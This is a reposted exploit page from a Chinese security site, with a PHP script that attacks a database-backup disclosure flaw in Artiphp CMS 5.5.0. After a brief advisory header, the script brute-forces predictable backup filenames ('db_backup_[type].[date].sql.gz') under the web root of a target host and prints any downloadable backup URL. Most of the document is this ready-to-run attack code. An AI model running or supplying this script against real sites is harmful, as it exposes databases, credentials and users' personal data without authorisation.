Artiphp CMS 5.5.0数据库备份泄露Exploit - 网站安全

<?php   /*   Artiphp CMS 5.5.0 Database Backup Disclosure Exploit     作者: Artiphp HdhCmsTest2cto测试数据 http://HdhCmsTestartiphp测试数据 影响版本: 5.5.0 Neo (r422)   Summary: Artiphp is a content management system (CMS) open and free to create and manage your website.   描述: Artiphp stores database backups using backupDB() utility with a predictable file name inside the web root, which can be exploited to disclose sensitive information by downloading the file. The backup is located in '/artzone/artpublic/database/' directory as 'db_backup_[type].[yyyy-mm-dd].sql.gz' filename.   测试平台: Microsoft Windows XP Professional SP3 (EN)            Apache 2.2.21            PHP 5.3.8 / 5.3.9            MySQL 5.5.20     Gjoko 'LiquidWorm' Krstic @zeroscience发现的本 漏洞       */   error_reporting(0);   print "\no==========================================================o\n"; print "|                                                          |"; print "\n|\tArtiphp CMS 5.5.0 DB Backup Disclosure Exploit     |\n"; print "|                                                          |\n"; print "|\t\t\tby LiquidWorm                      |\n"; print "|                                                          |"; print "\no==========================================================o\n";   if ($argc < 3) {     print "\n\n\x20[*] Usage: php $argv[0] <host> <port>\n\n\n";     die(); }   $godina_array = array('2012','2011','2010');   $mesec_array = array('12','11','10','09',              '08','07','06','05',              '04','03','02','01');   $dn_array = array('31','30','29','28','27','26',           '25','24','23','22','21','20',           '19','18','17','16','15','14',           '13','12','11','10','09','08',           '07','06','05','04','03','02',           '01');   $backup_array = array('full','structure','partial');   $host = $argv[1]; $port = intval($argv[2]); $path = "/artiphp/artzone/artpublic/database/"; // HdhCmsTest2cto测试数据 change per need.   $alert1 = "\033[0;31m"; $alert2 = "\033[0;37m";   foreach($godina_array as $godina) {     print "\n\n\x20[*] Checking year: ".$godina."\n\n Scanning: ";     sleep(2);     foreach($mesec_array as $mesec)     {         foreach($dn_array as $dn)         {             print "~";             foreach($backup_array as $backup)             {                 if(file_get_contents("http://".$host.":".$port.$path."db_backup_".$backup.".".$godina."-".$mesec."-".$dn.".sql.gz"))                 {                     print "\n\n\x20[!] DB backup file discovered!\n\n";                     echo $alert1;                     print "\x20==>\x20";                     echo $alert2;                     die("http://".$host.":".$port.$path."db_backup_".$backup.".".$godina."-".$mesec."-".$dn.".sql.gz\n");                 }             }         }     } }   print "\n\n\x20[*] Zero findings.\n\n\n"   ?>

查看更多关于Artiphp CMS 5.5.0数据库备份泄露Exploit - 网站安全的详细内容...